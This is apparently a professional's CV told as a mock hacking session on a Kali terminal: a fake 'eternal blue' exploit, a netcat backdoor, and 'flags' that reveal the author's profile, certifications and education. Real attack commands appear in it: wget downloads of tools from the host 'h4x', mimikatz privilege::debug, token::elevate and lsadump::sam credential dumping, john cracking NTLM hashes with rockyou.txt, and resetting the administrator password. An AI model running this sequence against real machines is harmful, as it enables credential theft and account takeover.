System is starting up!
Loading up things...
###### LOADING! #######
CPU warm-up......[ OK ]
GPU warm-up......[ OK ]
Int. RAM.........[ OK ]
Int. HD0001......[ OK ]
Int. HD0002......[ OK ]
Int. LUN00014....[ OK ]
Int. LUN00015....[ OK ]
Int. settings....[ OK ]
Connecting TOR...[ OK ]
Proxy chains.....[ OK ]
Secret stuff.....[ OK ]
Loading GUI......[ OK ]
Randomizing......[ OK ]
Completing.......[ OK ]
##### COMPLETED! #####
┌──(kali㉿kali)-[~] whoami
kali
└─$ hostname h4x
└─$ uptime 00:01:09
└─$ pwd /home/kali
└─$ cd "/home/Henrik Parkkinen"
└─$ su "Henrik Parkkinen"
Password:
└─$ whoami
Henrik Parkkinen
└─$ whoami 2>/dev/null > 3v1lrpc.txt
└─$ gcc 3v1lrpc.txt -o 3v1lrpc.exe
└─$ python3 -m http.server 443
└─$ nc [TARGET IP] 1337
└─$ 3vil$h3ll:>
Connected to target machine!
#CONNECTION
#TO
#EVIL
#AND
#SNEAKY
#BACKDOOR
#SUCCESSFULLY
#ESTABLISHED!
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> /bin/bash -i
└─$ 3vil$h3ll:> whoami
NT/Guest
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> wget https://h4x/3v1lrpc.exe
└─$ 3vil$h3ll:> chmod +x 3v1lrpc.exe
└─$ 3vil$h3ll:> ./3v1lrpc.exe
##################################
###########3v1lrpc.exe############
##################################
[loading*] 3v1lrpc.exe ...
[loading completed*]
Set Options:
rports: [*]
rhosts: [*]
payload: [*]
lhost: [127.0.0.1]
aux: [nc]
eternal blue: [True]
Run exploit: Y
[processing*]
[payload initiated*]
[exploit checking*]
[exploit running*]
-----------------------------------
[PAYLOAD BUFFER]
-----------------------------------
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
.....-=$[HACKING ONGOING]$=-.....
WARNING!
APESHIT UNLEASHED ON ALL PORTS
[RPC Exploitations Ongoing*]
...Time to drink coffee...
...Guessing random ports...
...Shooting 3v1l payloads...
...#65535 is the answer...
...GL HF GG...
...3v1l sh1t...
...<VOID>...
<<<<<<<<<<<<<{3v1lrpc}>>>>>>>>>>>>>
-----------------------------------
[/PAYLOAD BUFFER]
-----------------------------------
[exploit*] 100% completed!
[exploit*] successful!
[hidden flag found*]
e1Nob3cgSGVucmlrIFBhcmtraW5lbidzIGZ1bGwgcHJvZmlsZSBieSBleGVjdXRpbmcgbmV0IHVzZXIgSGVucmlrIFBhcmtraW5lbiAvYWxsIGluIGNtZH0=
##################################
###########3v1lrpc.exe############
##################################
└─$ 3vil$h3ll:> base64 -d flag.txt
[REDACTED]
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:>
└─$ 3vil$h3ll:> shell
└─$ C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> net user "Henrik Parkkinen"
#PROFILE
Name: Henrik Parkkinen
Company: Onevinn AB
Country: Sweden
Location: Remote [From Planet Earth]
Language: Swedish, English & Finnish
Experience: +20 years
Role: ZybR C:qr1ty g33k
Title: <VOID>
Understands: Digital ecosystem, Emerging technologies, Business Management, Cyber attack & threat landscape, Offensive Security, Defensive Security, Infrastructure, Enterprise & Security Architecture
Background: OffSec, DeffSec, Technical, Hands-on, Management, Leadership, Security Architecture
Strengths: Analytical, Strategic thinking, Team-player, Leader
Communication: All levels. Technical SMEs to C-level, Boards & Executives
Presentations skills: Strong, both visual and verbal
Mindset: Pragmatic, Progressive, Self-reflecting & gets sh*t done
Attitude: Positive, Calm & Authentic
H4xing: Kali Linux, Empire & Starkiller, Metasploit, Armitage, Nessus, Hydra, John, Hashcat, gobuster, Burp, ZAP, WireShark, NMAP, dig, OSINT, SQLMAP, Autopsy, Notepad
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32>
└─$ C:\Windows\System32> cd\
└─$ C:\> dir /s "userflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Henrik Parkkinen\Desktop
xxxx-yy-zz 02:49 userflag.txt
1 File(s) 90 bytes
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> cd C:\Users\Henrik Parkkinen\Desktop
└─$ C:\Users\Henrik Parkkinen\Desktop> more userflag.txt
#KNOWLEDGE, EXPERIENCE & EDUCATION [VERBOSE MODE]
#Certifications & Certificates
CISM - ISACA
CISA - ISACA
CRISC - ISACA
CCSK - CSA
eJPT - eLearnSecurity
MCP - MSFT
[OBSOLETE]
MCITP: Ent Admin - MSFT
MCTS - MSFT
MCSE: SEC - MSFT
MCSA: SEC - MSFT
MCSE - MSFT
MCSA - MSFT
#Frameworks & Standards
NIST CSF
CSA CCM
ISO 27001
CIS CSC
ITIL
MITRE ATT&CK
#Cyber & Info Sec skills
Sec Assessments
Sec Auditing
Governance
Cloud Sec
Risk Mgmt
Strategy
Mgmt Consulting
Threat Modelling
Sec Architecture
3rd & Supply Chain Sec
#Assignments & Exp.
CISO
Auditor
Advisor
Architect
Specialist
<Prefix> Leader
<Prefix> Manager
#EDUCATION
The State UNV of New York
International cyber conflicts
Delft UNV of Technology
Cyber security economics
UNV of Washington
Info sec & risk mgmt context
Building an info sec risk mgmt toolkit
Designing & executing info sec strategies
Higher Vocational IT Education
Infra, NW, FW, & IT-sec
+multiple vendor courses & lectures
#Leadership & Mgmt EDU
Individual Leadership Dev & Growth
Leading Leaders
Self-leadership
LMI International
Building & Leading Teams
Personal Leadership
Schinkler Management
Building The Winning Team
Focus Consulting
Leadership & Business Mgmt
Vendita
Effective Communication
#Volunteering & Accomplishments
ISACA – SME Review: CRISC RM 7th
ISACA – SME Review: DTEF
#Fun
THM – Top 1% [Global], Top 30 [Sweden]
#Epilogue
Stay Curious. Hack Stuff. Be Creative. Laugh. Improve. Resilience. Together. Protect. Be Cool. Relax. Share Knowledge. Wisdom. G33k. Inspire Others. Authenticity. Think. Positive Mindset. 1337. Chill. Good Vibes. Security. Recon. whoami. Learn. Contemplate. Be Kind.
└─$ C:\Users\Henrik Parkkinen\Desktop> cd\
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> echo coffee break. brb
coffee break. brb
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> dir /s "rootflag.txt"
Volume in drive C is Local Disk
Volume Serial Number is xxxx-yyyy
Directory of C:\Users\Administrator
xxxx-yy-zz 04:15 rootflag.txt
1 File(s) 12 bytes
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
Access Denied
└─$ C:\Users\Administrator> cd C:\Temp
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> wget https://h4x/mimikatz.exe
└─$ C:\Temp> mimikatz.exe
.#####. mimikatz, "Kiwi"
.## ^ ##.
## / \ ## /* * *
## \ / ## [REDACTED INFO]
'## v ##' [REDACTED WEBSITE]
'#####'
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
mimikatz # lsadump::sam
Domain: [REDACTED]
SysKey: [REDACTED]
Local SID: [REDACTED]
SAMKey: [REDACTED]
RID: [REDACTED]
User: Administrator
Hash NTLM: [REDACTED]
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp>
└─$ C:\Temp> background
└─$ 3vil$h3ll:> john --format=NT -w=rockyou.txt hash.txt
Done!
The Password is: [REDACTED]
└─$ 3vil$h3ll:> shell
└─$ C:\Windows\System32> whoami
NT/Henrik Parkkinen
└─$ C:\Windows\System32> cd\
└─$ C:\>
└─$ C:\>
└─$ C:\>
└─$ C:\> net user administrator [REDACTED]
The command completed successfully
└─$ C:\> whoami
NT/Administrator
└─$ C:\> cd C:\Users\Administrator
└─$ C:\Users\Administrator> more rootflag.txt
#Top secret message
----------<-¤<=NINJA=>¤->----------
└─$ C:\Users\Administrator> exit
└─$ 3vil$h3ll:> exit
└─$ clear
└─$
└─$
└─$
└─$ exit
└─$ shutdown now
The system is shutting down NOW!
Broadcast message from:
Henrik Parkkinen
Message:
Follow the white rabbit...
Purging history cache....[ OK ]
Deleting temp things.....[ OK ]
Doing funky stuff =).....[ OK ]
LUN00014 unmount.........[ OK ]
LUN00015 unmount.........[ OK ]
Purging virtual memory...[ OK ]
Recycling something......[ OK ]
Stopping http server.....[ OK ]
Stopping all services....[ OK ]
Disconnecting TOR........[ OK ]
Killing all processes....[ OK ]
==== SYSTEM POWERED OFF ====